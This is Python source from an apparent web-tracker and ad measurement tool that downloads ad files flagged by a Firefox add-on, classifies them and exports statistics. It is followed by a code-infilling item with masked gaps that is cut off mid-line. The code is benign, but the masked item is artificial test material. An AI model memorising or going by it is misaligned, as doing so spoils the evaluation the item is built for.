entry['bug']['name'].replace(' ','').replace('/','_') bugsrc = entry['ent']['policyContentLocation'] bugpattern = entry['bug']['pattern'] try : bugaffiliation = entry['bug']['affiliation'] except KeyError: bugaffiliation = "" bugtype = entry['bug']['type'] bugpathname = entry['ent']['pathname'] return WebBug(name=bugname, src=bugsrc, affiliation=bugaffiliation, bug_type=bugtype, matched_pattern=bugpattern, pathname=bugpathname) def curl_worker_legacy(args): output_dir = args[0] saved_file_name = args[1] path = args[2] bug = args[3] curl_result_queue = args[4] # subprocess.call(['curl', '-o', path , bug.get_src() ]) subprocess.call(['wget', '-t', '1', '-q', '-T', '3', '-O', path , bug.get_src()]) # Use the unix tool 'file' to check filetype subpr_out = subprocess.check_output(['file', '-b', path]).strip() filetype, is_ad = get_bug_type(subpr_out) if is_ad: new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name, filetype)) else: new_path = os.path.join(output_dir, 'notad', '%s.%s' % (saved_file_name,\ filetype)) os.rename(path, new_path) bug.set_is_ad(is_ad) bug.set_filetype(filetype) bug.set_filepath(new_path) curl_result_queue.put(bug) def process_results_legacy(refresh_count, output_dir, ext_queue, result_queue,\ num_of_workers=8): """ This function goes through all the bugs identified by the firefox plugin and aggregates each bug's occurence in a given page. The aggregation is necessary for duplicate ads on the same page """ bug_dict = {} # dict to keep track of how many duplicates of each bug, if # exists try: # separate the non-ads from the ads for ease of handchecking os.makedirs(output_dir) os.makedirs(os.path.join(output_dir, 'notad')) except OSError: pass # uses a pool of 'curl' workers curl_worker_pool = Pool(processes=num_of_workers) manager = Manager() curl_result_queue = manager.Queue() dl_counter = 0 # keep track of how many bugs downloaded while True: try: found_bugs = json.loads(ext_queue.get(block=True, timeout=2)) except Exception: LOG.debug('Timing out on get from queue...') break for entry in found_bugs: bugname = entry['bug']['name'].replace(' ','').replace('/','_') bugsrc = entry['ent']['policyContentLocation'] bugpattern = entry['bug']['pattern'] try : bugaffiliation = entry['bug']['affiliation'] except KeyError: bugaffiliation = "" bugtype = entry['bug']['type'] bugpathname = entry['ent']['pathname'] bug = WebBug(name=bugname, src=bugsrc, affiliation=bugaffiliation, bug_type=bugtype, matched_pattern=bugpattern, pathname=bugpathname) try: # matched an entry in the bugdict, incr count and continue bug_dict[bug] += 1 continue except KeyError: bug_dict[bug] = 1 saved_location ='Visit%d_%s%d' % (refresh_count, bugname,\ dl_counter) dl_counter += 1 save_to_path = os.path.join( output_dir, '%s' % saved_location) obj = curl_worker_pool.apply_async(curl_worker_legacy, \ ((output_dir, saved_location, save_to_path, bug, curl_result_queue),)) try: sleep(0.5) curl_worker_pool.join() curl_worker_pool.close() curl_worker_pool.terminate() except Exception: LOG.debug('Closing pool') while not curl_result_queue.empty(): cbug = curl_result_queue.get() # ugly code here bugcount = bug_dict[cbug] del bug_dict[cbug] bug_dict[cbug] = bugcount with open( os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w') as fwtr: cPickle.dump(bug_dict, fwtr) result_queue.put(bug_dict) def curl_worker(output_dir, input_queue, worker_output_queue, worker_id,\ ack_queue): while True: try: task = input_queue.get() if len(task) == 1 and task[0] == "STOP": LOG.debug('curl_worker %d received stop' % worker_id) break except Exception: LOG.error('Error:') #LOG.debug(task) saved_file_name = task[0] path = task[1] bug = task[2] try: # subprocess.call(['curl', '-o', path , bug.get_src()]) subprocess.call(['wget', '-t', '1', '-q', '-T', '3', '-O', path , bug.get_src()]) subpr_out = subprocess.check_output(['file', '-b', path]).strip() except Exception as e : LOG.debug('Exception captured %s\n\n' % e) filetype, is_ad = get_bug_type(subpr_out) if is_ad: new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name, filetype)) else: new_path = os.path.join(output_dir, 'notad', '%s.%s' % (saved_file_name,\ filetype)) os.rename(path, new_path) bug.set_is_ad(is_ad) bug.set_filetype(filetype) bug.set_filepath(new_path) worker_output_queue.put(bug) ack_queue.put(worker_id) return def build_nodes(jsonData): """ This function takes a JSON encoded output of the firefox addon and builds a call graph for the javascript/HTML redirections @rtype nodes: dict @return: A graph of redirection chains """ nodes = {} def _process_cookiestr(cookieStr): """ parses a dictionary of req/resp calls to extract the cookie information returns a list of cookies set on this domain """ cookie_list = [] # parses cookie str if a cookie has been set for cookie in cookieStr.split('\n'): c = {} for cook in cookie.split(';'): token = cook.split('=', 1) if len(token) < 2: # usually this is just a flag e.g HTTPOnly, HTTPSOnly continue c[token[0]] = token[1] cookie_list.append(c) return cookie_list def _check_node(d): try: domain_node = nodes[d] except KeyError: isBug, bug_name, bug_type = ADREGEX.search(domain) domain_node = WebNode(domain, isBug, bug_name, bug_type) nodes[d] = domain_node return domain_node #jsonData contains all the domains and all the req/resp pairs made to them #iterating over the domains first for domain, dval in jsonData.items(): # but first check if a node for this domain has been created or not domain_node = _check_node(domain) cookie_list = [] # iterating thru all the req/resp pairs on a domain for info in dval: domainPath = info['domainPath'] referrerPath = info['referrerPath'] referrer = info['referrer'] cookieBool = info['cookie'] parsed_cookie = None if cookieBool: cookieStr = info['cookiestr'] parsed_cookie = _process_cookiestr(cookieStr) cookie_list.append(parsed_cookie) domain_node.add_reqresp({'domainPath' : domainPath, 'referrer' : referrer, 'referrerPath' : referrerPath, 'cookieList' : parsed_cookie }) # making sure that we also create the node for the referrer referrer_node = _check_node(referrer) referrer_node.add_child(domain_node) domain_node.add_parent(referrer_node) domain_node.set_cookies(cookie_list) return nodes def filter_results(extQueue, timeout_value, url): """ This function takes the JSON output of the firefox addon, and matches the request URL against a list of known tracker/ads regexes. Returns data structure containing request/resp info Returns None if did not receive results from FF addon """ from Queue import Empty try: LOG.debug('Timeout value in filter_result :%d' % timeout_value) nodes = extQueue.get(True, timeout=timeout_value) except Empty as e: LOG.info('Did not receive any results from FF plugin for %s' % url) nodes = None finally: while not extQueue.empty(): extQueue.get() return nodes def process_results(refresh_count, output_dir, ext_queue, result_queue, num_of_workers=8): """ This function goes through all the bugs identified by the firefox plugin and aggregates each bug's occurence in a given page. The aggregation is necessary for duplicate ads on the same page """ workers_dict = {} # keep track of worker processes input_queue = Queue() # asynchronously feed workers task to do worker_output_queue = Queue() # output queue from workers ack_queue = Queue() bug_dict = {} # dict to keep track of how many duplicates of each bug, if # exists try: # separate the non-ads from the ads for ease of handchecking os.makedirs(output_dir) os.makedirs(os.path.join(output_dir, 'notad')) except OSError: # Directory is created, Okay to pass pass for i in range(num_of_workers): p = Process(target=curl_worker, args=(output_dir, input_queue,\ worker_output_queue, i, ack_queue)) p.start() workers_dict[i] = p # uses a pool nodesurl' workers # curl_worker_pool = Pool(processes=8) # manager = Manager() # curl_result_queue = manager.Queue() dl_counter = 0 # keep track of how many bugs downloaded while True: try: found_bugs = json.loads(ext_queue.get(block=True, timeout=2)) except Exception: LOG.debug('No more bugs found, break out of queue') break for entry in found_bugs: bug = parse_buginfo(entry) try: # matched an entry in the bugdict, incr count and continue bug_dict[bug] += 1 continue except KeyError: bug_dict[bug] = 1 try: saved_location ='Visit%d_%s%d' % (refresh_count, bug.get_name(), dl_counter) dl_counter += 1 save_to_path = os.path.join( output_dir, '%s' % saved_location) input_queue.put((saved_location, save_to_path, bug)) except Exception as e: LOG.exception('%s' % e) for i in range(num_of_workers): # send stop signal input_queue.put(("STOP",)) stopped = 0 while stopped < len(workers_dict): ack = ack_queue.get() p = workers_dict[ack] p.join(timeout=1) if p.is_alive(): p.terminate() LOG.debug('terminating process %d' % ack) stopped += 1 while not worker_output_queue.empty(): # receive results from the worker cbug = worker_output_queue.get() # ugly code here bugcount = bug_dict[cbug] del bug_dict[cbug] bug_dict[cbug] = bugcount with open( os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w') as fwtr: cPickle.dump(bug_dict, fwtr) result_queue.put(bug_dict) return
normal
{ "blob_id": "fdae984f7cf5e1c20dee197d3f2518a0c7c38bdc", "index": 8085, "step-1": "<mask token>\n\n\ndef check_duplicate(fp1, fp2):\n \"\"\"takes two files, does a diff on them, returns True if same\"\"\"\n try:\n subprocess.check_output(['diff', fp1, fp2])\n return True\n except subprocess.CalledProcessError:\n return False\n\n\ndef identify_uniq_ads(session_results):\n \"\"\"\n i) Identify duplicate ads\n ii) bin the ads by their dimensions\n iii) Keep track of the test sites and have many times they have displayed this\n ad\n \"\"\"\n ads = {}\n notads = {}\n swf_bin = {}\n img_bin = {}\n error_bugs = []\n for train_category, cat_dict in session_results.items():\n for test_site, bug_dict_list in cat_dict.items():\n for index_count in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[index_count]\n for bug, bug_count in bug_dict.items():\n bug_filetype = bug.get_filetype()\n bug_filepath = bug.get_filepath()\n if bug_filepath == '':\n error_bugs.append(bug)\n continue\n if bug.is_ad():\n height = '999'\n width = '999'\n if bug_filetype == 'swf':\n target_bin = swf_bin\n try:\n width = subprocess.check_output(['swfdump',\n '-X', bug_filepath]).split(' ')[-1].strip()\n height = subprocess.check_output(['swfdump',\n '-Y', bug_filepath]).split(' ')[-1].strip()\n except subprocess.CalledProcessError:\n LOG.exception('swfdump error on file %s' %\n bug_filepath)\n else:\n target_bin = img_bin\n LOG.debug(bug_filepath)\n try:\n height = subprocess.check_output([\n 'identify', '-format', '\"%h\"',\n bug_filepath]).strip()\n width = subprocess.check_output(['identify',\n '-format', '\"%w\"', bug_filepath]).strip()\n except subprocess.CalledProcessError:\n LOG.exception('identify error on file %s' %\n bug_filepath)\n try:\n bug.set_dimension(height, width)\n dimension = '%s-%s' % (height, width)\n m_list = target_bin[dimension]\n dup = None\n for m in m_list:\n if check_duplicate(bug_filepath, m.\n get_filepath()):\n dup = m\n break\n if dup:\n if test_site in ads[dup]:\n ads[dup][test_site] += bug_count\n else:\n ads[dup] = {test_site: bug_count}\n del bug_dict[bug]\n bug_dict[dup] = bug_count\n else:\n target_bin[dimension].append(bug)\n ads[bug] = {test_site: bug_count}\n except KeyError:\n target_bin[dimension] = [bug]\n ads[bug] = {test_site: bug_count}\n return ads, error_bugs\n\n\ndef export_uniq_ads(ads, out_folder, rel_folder):\n \"\"\"\n Takes all the uniq ads seen in this session and writes its metadata\n information to a csv file\n \"\"\"\n try:\n os.makedirs(out_folder)\n os.makedirs(os.path.join(out_folder, rel_folder))\n except OSError:\n LOG.debug('Creating output folder')\n fwtr = open(os.path.join(out_folder, 'uniq_ads.csv'), 'w')\n fwtr.write(\n '#UID, Ad-Company, Ad-Filetype, Height, Width, Rel-Location, src\\n')\n for bug in ads.keys():\n height, width = bug.get_dimension()\n filepath = bug.get_filepath()\n name = bug.get_name()\n src = bug.get_src()\n filetype = bug.get_filetype()\n new_uuidname = '%s.%s' % (uuid1(), filetype)\n bug.set_uuid(new_uuidname)\n new_filepath = os.path.join(out_folder, new_uuidname)\n rel_filepath = os.path.join(rel_folder, new_uuidname)\n copy2(filepath, new_filepath)\n fwtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}\\n'.format(\n new_uuidname, name, filetype, height, width, rel_filepath, src))\n fwtr.close()\n return ads\n\n\n<mask token>\n\n\ndef export_ads(results, out_folder):\n \"\"\"\n This function creates a csv file which contains all the unique ads seen in\n each test site (including all the refreshes)\n\n TODO update the doc\n results is a dictionary of the following\n results = { Category : Value, ... }\n value = { test_site_url : [ result1, result2, ... resultN], ... }\n resultN : { WebBug : count, ... }\n \"\"\"\n try:\n os.makedirs(out_folder)\n except OSError:\n LOG.debug('Creating output file folder ...')\n export_ad_counter = 1\n with open(os.path.join(out_folder, 'ad_labelling.csv'), 'w') as fwtr:\n fwtr.write('#{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}, {9}\\n'.\n format('Ad#', 'Company', 'FileType', 'Ad-Category',\n 'Website-URL', 'Refresh-Num', 'Training-Topic',\n 'Context-of-site', 'Total', 'Ad-src'))\n for train_category, cat_dict in results.items():\n for test_site, bug_dict_list in cat_dict.items():\n for refresh_num in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[refresh_num]\n for bug, bugcount in bug_dict.items():\n if not bug.is_ad():\n continue\n if bug.get_filetype() in ['swf', 'png', 'gif', 'jpg']:\n file_name = '%d.%s' % (export_ad_counter, bug.\n get_filetype())\n new_location = os.path.join(out_folder, file_name)\n copy2(bug.get_filepath(), new_location)\n fwtr.write(\n \"\"\"{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7} , {8}, {9}, \n\"\"\"\n .format(file_name, bug.get_name(), bug.\n get_filetype(), '', test_site, refresh_num,\n train_category, 'N/A', bugcount, bug.get_src())\n )\n export_ad_counter += 1\n\n\ndef get_bug_type(file_type):\n is_ad = False\n bug_type = 'text'\n if file_type.startswith('HTML') or file_type.startswith('ASCII'\n ) or file_type.startswith('UTF-8 Unicode English'\n ) or file_type.startswith('very short'):\n bug_type = 'text'\n elif file_type.endswith('1 x 1') and file_type.startswith('GIF'):\n bug_type = 'gif'\n elif file_type.startswith('PNG'):\n bug_type = 'png'\n is_ad = True\n elif file_type.startswith('GIF'):\n bug_type = 'gif'\n is_ad = True\n elif file_type.startswith('Macromedia Flash'):\n bug_type = 'swf'\n is_ad = True\n elif file_type.startswith('JPEG'):\n bug_type = 'jpg'\n is_ad = True\n return bug_type, is_ad\n\n\ndef parse_buginfo(entry):\n \"\"\"\n Takes the json decoded bug information and inserts it into a WebBug instance\n \"\"\"\n bugname = entry['bug']['name'].replace(' ', '').replace('/', '_')\n bugsrc = entry['ent']['policyContentLocation']\n bugpattern = entry['bug']['pattern']\n try:\n bugaffiliation = entry['bug']['affiliation']\n except KeyError:\n bugaffiliation = ''\n bugtype = entry['bug']['type']\n bugpathname = entry['ent']['pathname']\n return WebBug(name=bugname, src=bugsrc, affiliation=bugaffiliation,\n bug_type=bugtype, matched_pattern=bugpattern, pathname=bugpathname)\n\n\n<mask token>\n\n\ndef process_results_legacy(refresh_count, output_dir, ext_queue,\n result_queue, num_of_workers=8):\n \"\"\"\n This function goes through all the bugs identified by the firefox plugin and\n aggregates each bug's occurence in a given page. The aggregation is necessary\n for duplicate ads on the same page\n \"\"\"\n bug_dict = {}\n try:\n os.makedirs(output_dir)\n os.makedirs(os.path.join(output_dir, 'notad'))\n except OSError:\n pass\n curl_worker_pool = Pool(processes=num_of_workers)\n manager = Manager()\n curl_result_queue = manager.Queue()\n dl_counter = 0\n while True:\n try:\n found_bugs = json.loads(ext_queue.get(block=True, timeout=2))\n except Exception:\n LOG.debug('Timing out on get from queue...')\n break\n for entry in found_bugs:\n bugname = entry['bug']['name'].replace(' ', '').replace('/', '_')\n bugsrc = entry['ent']['policyContentLocation']\n bugpattern = entry['bug']['pattern']\n try:\n bugaffiliation = entry['bug']['affiliation']\n except KeyError:\n bugaffiliation = ''\n bugtype = entry['bug']['type']\n bugpathname = entry['ent']['pathname']\n bug = WebBug(name=bugname, src=bugsrc, affiliation=\n bugaffiliation, bug_type=bugtype, matched_pattern=\n bugpattern, pathname=bugpathname)\n try:\n bug_dict[bug] += 1\n continue\n except KeyError:\n bug_dict[bug] = 1\n saved_location = 'Visit%d_%s%d' % (refresh_count, bugname,\n dl_counter)\n dl_counter += 1\n save_to_path = os.path.join(output_dir, '%s' % saved_location)\n obj = curl_worker_pool.apply_async(curl_worker_legacy, ((\n output_dir, saved_location, save_to_path, bug,\n curl_result_queue),))\n try:\n sleep(0.5)\n curl_worker_pool.join()\n curl_worker_pool.close()\n curl_worker_pool.terminate()\n except Exception:\n LOG.debug('Closing pool')\n while not curl_result_queue.empty():\n cbug = curl_result_queue.get()\n bugcount = bug_dict[cbug]\n del bug_dict[cbug]\n bug_dict[cbug] = bugcount\n with open(os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w'\n ) as fwtr:\n cPickle.dump(bug_dict, fwtr)\n result_queue.put(bug_dict)\n\n\ndef curl_worker(output_dir, input_queue, worker_output_queue, worker_id,\n ack_queue):\n while True:\n try:\n task = input_queue.get()\n if len(task) == 1 and task[0] == 'STOP':\n LOG.debug('curl_worker %d received stop' % worker_id)\n break\n except Exception:\n LOG.error('Error:')\n saved_file_name = task[0]\n path = task[1]\n bug = task[2]\n try:\n subprocess.call(['wget', '-t', '1', '-q', '-T', '3', '-O', path,\n bug.get_src()])\n subpr_out = subprocess.check_output(['file', '-b', path]).strip()\n except Exception as e:\n LOG.debug('Exception captured %s\\n\\n' % e)\n filetype, is_ad = get_bug_type(subpr_out)\n if is_ad:\n new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name,\n filetype))\n else:\n new_path = os.path.join(output_dir, 'notad', '%s.%s' % (\n saved_file_name, filetype))\n os.rename(path, new_path)\n bug.set_is_ad(is_ad)\n bug.set_filetype(filetype)\n bug.set_filepath(new_path)\n worker_output_queue.put(bug)\n ack_queue.put(worker_id)\n return\n\n\n<mask token>\n\n\ndef filter_results(extQueue, timeout_value, url):\n \"\"\"\n This function takes the JSON output of the firefox addon, and matches the\n request URL against a list of known tracker/ads regexes. \n\n Returns data structure containing request/resp info\n Returns None if did not receive results from FF addon\n \"\"\"\n from Queue import Empty\n try:\n LOG.debug('Timeout value in filter_result :%d' % timeout_value)\n nodes = extQueue.get(True, timeout=timeout_value)\n except Empty as e:\n LOG.info('Did not receive any results from FF plugin for %s' % url)\n nodes = None\n finally:\n while not extQueue.empty():\n extQueue.get()\n return nodes\n\n\ndef process_results(refresh_count, output_dir, ext_queue, result_queue,\n num_of_workers=8):\n \"\"\"\n This function goes through all the bugs identified by the firefox plugin and\n aggregates each bug's occurence in a given page. The aggregation is necessary\n for duplicate ads on the same page\n \"\"\"\n workers_dict = {}\n input_queue = Queue()\n worker_output_queue = Queue()\n ack_queue = Queue()\n bug_dict = {}\n try:\n os.makedirs(output_dir)\n os.makedirs(os.path.join(output_dir, 'notad'))\n except OSError:\n pass\n for i in range(num_of_workers):\n p = Process(target=curl_worker, args=(output_dir, input_queue,\n worker_output_queue, i, ack_queue))\n p.start()\n workers_dict[i] = p\n dl_counter = 0\n while True:\n try:\n found_bugs = json.loads(ext_queue.get(block=True, timeout=2))\n except Exception:\n LOG.debug('No more bugs found, break out of queue')\n break\n for entry in found_bugs:\n bug = parse_buginfo(entry)\n try:\n bug_dict[bug] += 1\n continue\n except KeyError:\n bug_dict[bug] = 1\n try:\n saved_location = 'Visit%d_%s%d' % (refresh_count, bug.\n get_name(), dl_counter)\n dl_counter += 1\n save_to_path = os.path.join(output_dir, '%s' % saved_location)\n input_queue.put((saved_location, save_to_path, bug))\n except Exception as e:\n LOG.exception('%s' % e)\n for i in range(num_of_workers):\n input_queue.put(('STOP',))\n stopped = 0\n while stopped < len(workers_dict):\n ack = ack_queue.get()\n p = workers_dict[ack]\n p.join(timeout=1)\n if p.is_alive():\n p.terminate()\n LOG.debug('terminating process %d' % ack)\n stopped += 1\n while not worker_output_queue.empty():\n cbug = worker_output_queue.get()\n bugcount = bug_dict[cbug]\n del bug_dict[cbug]\n bug_dict[cbug] = bugcount\n with open(os.path.join(output_dir, 'bug_dict%d.pkl' % refresh_count), 'w'\n ) as fwtr:\n cPickle.dump(bug_dict, fwtr)\n result_queue.put(bug_dict)\n return\n", "step-2": "<mask token>\n\n\ndef check_duplicate(fp1, fp2):\n \"\"\"takes two files, does a diff on them, returns True if same\"\"\"\n try:\n subprocess.check_output(['diff', fp1, fp2])\n return True\n except subprocess.CalledProcessError:\n return False\n\n\ndef identify_uniq_ads(session_results):\n \"\"\"\n i) Identify duplicate ads\n ii) bin the ads by their dimensions\n iii) Keep track of the test sites and have many times they have displayed this\n ad\n \"\"\"\n ads = {}\n notads = {}\n swf_bin = {}\n img_bin = {}\n error_bugs = []\n for train_category, cat_dict in session_results.items():\n for test_site, bug_dict_list in cat_dict.items():\n for index_count in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[index_count]\n for bug, bug_count in bug_dict.items():\n bug_filetype = bug.get_filetype()\n bug_filepath = bug.get_filepath()\n if bug_filepath == '':\n error_bugs.append(bug)\n continue\n if bug.is_ad():\n height = '999'\n width = '999'\n if bug_filetype == 'swf':\n target_bin = swf_bin\n try:\n width = subprocess.check_output(['swfdump',\n '-X', bug_filepath]).split(' ')[-1].strip()\n height = subprocess.check_output(['swfdump',\n '-Y', bug_filepath]).split(' ')[-1].strip()\n except subprocess.CalledProcessError:\n LOG.exception('swfdump error on file %s' %\n bug_filepath)\n else:\n target_bin = img_bin\n LOG.debug(bug_filepath)\n try:\n height = subprocess.check_output([\n 'identify', '-format', '\"%h\"',\n bug_filepath]).strip()\n width = subprocess.check_output(['identify',\n '-format', '\"%w\"', bug_filepath]).strip()\n except subprocess.CalledProcessError:\n LOG.exception('identify error on file %s' %\n bug_filepath)\n try:\n bug.set_dimension(height, width)\n dimension = '%s-%s' % (height, width)\n m_list = target_bin[dimension]\n dup = None\n for m in m_list:\n if check_duplicate(bug_filepath, m.\n get_filepath()):\n dup = m\n break\n if dup:\n if test_site in ads[dup]:\n ads[dup][test_site] += bug_count\n else:\n ads[dup] = {test_site: bug_count}\n del bug_dict[bug]\n bug_dict[dup] = bug_count\n else:\n target_bin[dimension].append(bug)\n ads[bug] = {test_site: bug_count}\n except KeyError:\n target_bin[dimension] = [bug]\n ads[bug] = {test_site: bug_count}\n return ads, error_bugs\n\n\ndef export_uniq_ads(ads, out_folder, rel_folder):\n \"\"\"\n Takes all the uniq ads seen in this session and writes its metadata\n information to a csv file\n \"\"\"\n try:\n os.makedirs(out_folder)\n os.makedirs(os.path.join(out_folder, rel_folder))\n except OSError:\n LOG.debug('Creating output folder')\n fwtr = open(os.path.join(out_folder, 'uniq_ads.csv'), 'w')\n fwtr.write(\n '#UID, Ad-Company, Ad-Filetype, Height, Width, Rel-Location, src\\n')\n for bug in ads.keys():\n height, width = bug.get_dimension()\n filepath = bug.get_filepath()\n name = bug.get_name()\n src = bug.get_src()\n filetype = bug.get_filetype()\n new_uuidname = '%s.%s' % (uuid1(), filetype)\n bug.set_uuid(new_uuidname)\n new_filepath = os.path.join(out_folder, new_uuidname)\n rel_filepath = os.path.join(rel_folder, new_uuidname)\n copy2(filepath, new_filepath)\n fwtr.write('{0}, {1}, {2}, {3}, {4}, {5}, {6}\\n'.format(\n new_uuidname, name, filetype, height, width, rel_filepath, src))\n fwtr.close()\n return ads\n\n\ndef write_run_info(RUNINFO_DIR, session_date):\n fp = os.path.join(RUNINFO_DIR, '%s.info' % session_date)\n with open(fp, 'w') as fwtr:\n fwtr.write('OK')\n\n\n<mask token>\n\n\ndef generate_stats(results, ads, vmid, session_date, export_folder,\n process_ex_time):\n \"\"\"\n Generates stats on\n - uniq ads seen on the test sites\n - total number of ads seen on the test sites\n - total number of ads seen on all test sites\n - total number of uniq ads seen on all test sites\n \"\"\"\n try:\n os.makedirs(export_folder)\n except OSError:\n pass\n totalads = 0\n totaluniqads = len(ads)\n totalad_category = {}\n uniqad_category = {}\n with open(os.path.join(export_folder, 'session_bugs.csv'), 'w'\n ) as bugs_wtr:\n bugs_wtr.write(\n \"\"\"#Ad-UID, Website-URL, Refresh-Num, Training-Topic, Site-Context, BugCount, BugSrc\n\"\"\"\n )\n for train_category, cat_dict in results.items():\n totalad_category[train_category] = {}\n uniqad_category[train_category] = {}\n for test_site, bug_dict_list in cat_dict.items():\n total_ads = 0\n uniq_ads = []\n for refresh_num in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[refresh_num]\n for bug, bugcount in bug_dict.items():\n if bug.is_ad():\n uuid = bug.get_uuid()\n bugs_wtr.write(\n '{0}, {1}, {2}, {3}, {4}, {5}, {6}\\n'.\n format(uuid, test_site, refresh_num,\n train_category, 'N/A', bugcount, bug.get_src())\n )\n total_ads += bugcount\n if bug not in uniq_ads:\n uniq_ads.append(bug)\n totalad_category[train_category][test_site] = total_ads\n uniqad_category[train_category][test_site] = len(uniq_ads)\n totalads += total_ads\n with open(os.path.join(export_folder, 'session_stats.csv'), 'w'\n ) as ses_wtr:\n ses_wtr.write('#VMID: %s\\n' % vmid)\n ses_wtr.write('#Session-Date: %s\\n' % session_date)\n ses_wtr.write('#Time to complete: %s\\n' % process_ex_time)\n ses_wtr.write('#Training Categories: %s\\n' % str(results.keys()))\n ses_wtr.write('#Total Number of ads: %d\\n' % totalads)\n ses_wtr.write('#Total Uniq ads: %d\\n\\n' % totaluniqads)\n ses_wtr.write(\n '#TrainingTopic, Test-Site, NumberOfVisit, TotalAds, UniqAds\\n')\n for train_category, cat_dict in results.items():\n for test_site, bug_dict_list in cat_dict.items():\n num_of_visit = len(bug_dict_list)\n ses_wtr.write('{0}, {1}, {2}, {3}, {4}\\n'.format(\n train_category, test_site, num_of_visit,\n totalad_category[train_category][test_site],\n uniqad_category[train_category][test_site]))\n\n\ndef export_ads(results, out_folder):\n \"\"\"\n This function creates a csv file which contains all the unique ads seen in\n each test site (including all the refreshes)\n\n TODO update the doc\n results is a dictionary of the following\n results = { Category : Value, ... }\n value = { test_site_url : [ result1, result2, ... resultN], ... }\n resultN : { WebBug : count, ... }\n \"\"\"\n try:\n os.makedirs(out_folder)\n except OSError:\n LOG.debug('Creating output file folder ...')\n export_ad_counter = 1\n with open(os.path.join(out_folder, 'ad_labelling.csv'), 'w') as fwtr:\n fwtr.write('#{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}, {9}\\n'.\n format('Ad#', 'Company', 'FileType', 'Ad-Category',\n 'Website-URL', 'Refresh-Num', 'Training-Topic',\n 'Context-of-site', 'Total', 'Ad-src'))\n for train_category, cat_dict in results.items():\n for test_site, bug_dict_list in cat_dict.items():\n for refresh_num in range(len(bug_dict_list)):\n bug_dict = bug_dict_list[refresh_num]\n for bug, bugcount in bug_dict.items():\n if not bug.is_ad():\n continue\n if bug.get_filetype() in ['swf', 'png', 'gif', 'jpg']:\n file_name = '%d.%s' % (export_ad_counter, bug.\n get_filetype())\n new_location = os.path.join(out_folder, file_name)\n copy2(bug.get_filepath(), new_location)\n fwtr.write(\n \"\"\"{0}, {1}, {2}, {3}, {4}, {5}, {6}, {7} , {8}, {9}, \n\"\"\"\n .format(file_name, bug.get_name(), bug.\n get_filetype(), '', test_site, refresh_num,\n train_category, 'N/A', bugcount, bug.get_src())\n )\n export_ad_counter += 1\n\n\ndef get_bug_type(file_type):\n is_ad = False\n bug_type = 'text'\n if file_type.startswith('HTML') or file_type.startswith('ASCII'\n ) or file_type.startswith('UTF-8 Unicode English'\n ) or file_type.startswith('very short'):\n bug_type = 'text'\n elif file_type.endswith('1 x 1') and file_type.startswith('GIF'):\n bug_type = 'gif'\n elif file_type.startswith('PNG'):\n bug_type = 'png'\n is_ad = True\n elif file_type.startswith('GIF'):\n bug_type = 'gif'\n is_ad = True\n elif file_type.startswith('Macromedia Flash'):\n bug_type = 'swf'\n is_ad = True\n elif file_type.startswith('JPEG'):\n bug_type = 'jpg'\n is_ad = True\n return bug_type, is_ad\n\n\ndef parse_buginfo(entry):\n \"\"\"\n Takes the json decoded bug information and inserts it into a WebBug instance\n \"\"\"\n bugname = entry['bug']['name'].replace(' ', '').replace('/', '_')\n bugsrc = entry['ent']['policyContentLocation']\n bugpattern = entry['bug']['pattern']\n try:\n bugaffiliation = entry['bug']['affiliation']\n except KeyError:\n bugaffiliation = ''\n bugtype = entry['bug']['type']\n bugpathname = entry['ent']['pathname']\n return WebBug(name=bugname, src=bugsrc, affiliation=bugaffiliation,\n bug_type=bugtype, matched_pattern=bugpattern, pathname=bugpathname)\n\n\ndef curl_worker_legacy(args):\n output_dir = args[0]\n saved_file_name = args[1]\n path = args[2]\n bug = args[3]\n curl_result_queue = args[4]\n subprocess.call(['wget', '-t', '1', '-q', '-T', '3', '-O', path, bug.\n get_src()])\n subpr_out = subprocess.check_output(['file', '-b', path]).strip()\n filetype, is_ad = get_bug_type(subpr_out)\n if is_ad:\n new_path = os.path.join(output_dir, '%s.%s' % (saved_file_name,\n filetype))\n else:\n new_path = os.path.join(output_dir, 'notad', '%s.%s' % (\n saved_file_name, filetype))\n os.rename(path, new_path)\n bug.set_is_ad(is_ad)\n bug.set_filetype(filetype)\n bug.set_filepath(new_path)\n curl_result_queue.put(bug)\n\n\ndef process_results_legacy(refresh_count, output_dir, ext_queue,\n result_queue, num_of_workers=8):\n \"\"\"\n This function goes through all the bugs identified by the firefox plugin and\n aggregates each bug's occurence in a given page. The aggregation is necessary\n for duplicate ads on the same page\n \"\"\"\n bug_dict = {}\n try:\n os.makedirs(output_dir)\n os.makedirs(os.path.join(output_dir, 'notad'))\n except OSError:\n pass\n curl_worker_pool = Pool(processes=num_of_workers)\n manager = Manager()\n curl_result_queue = manager.Queue()\n dl_counter = 0\n while True:\n try:\n found_bugs = json.loads(ext_queue.get(block=True, timeout=2))\n except Exception:\n LOG.debug('Timing out on get from queue...')\n break\n for entry in found_bugs:\n bugname = entry['bug']['name'].replace(' ', '').replace('/', '_')\n bugsrc = entry['ent']['policyContentLocation']\n bugpattern = entry['bug']['pattern']\n try:\n bugaffiliation = entry['bug']['affiliation']\n except KeyError:\n bugaffiliation = ''\n bugtype = entry['bug']['type']\n bugpathname = entry['ent']['pathname']\n bug = WebBug(name=bugname, src=bugsrc, affiliation=\n bugaffiliation, bug_type=bugtype, matched_pattern=\n bugpattern, pathname=bugpathname)\n try:\n bug_dict[bug] += 1\n continue\n except KeyError:\n bug_dict[bug] = 1\n saved_location = 'Visit%d_%s%d' % (refresh_count, bugname,\n dl_counter)\n dl_counter += 1\n save_to_path = os.path.join(output_dir, '%s' % saved_location)\n obj = curl_worker_pool.apply_async(curl_worker_legacy, ((\n output_dir, saved_location, save_to_path, bug,\n curl_result_queue),))\n try:\n sleep(0.5)\n curl_worker_pool.join()\n curl_worker_pool.close()\n curl_worker_pool.terminate()\n except Exception:\n LOG.debug('Closing pool')\n while not curl_result_queue.empty():\n cbug = curl_result_queue.get()\n bugcount = 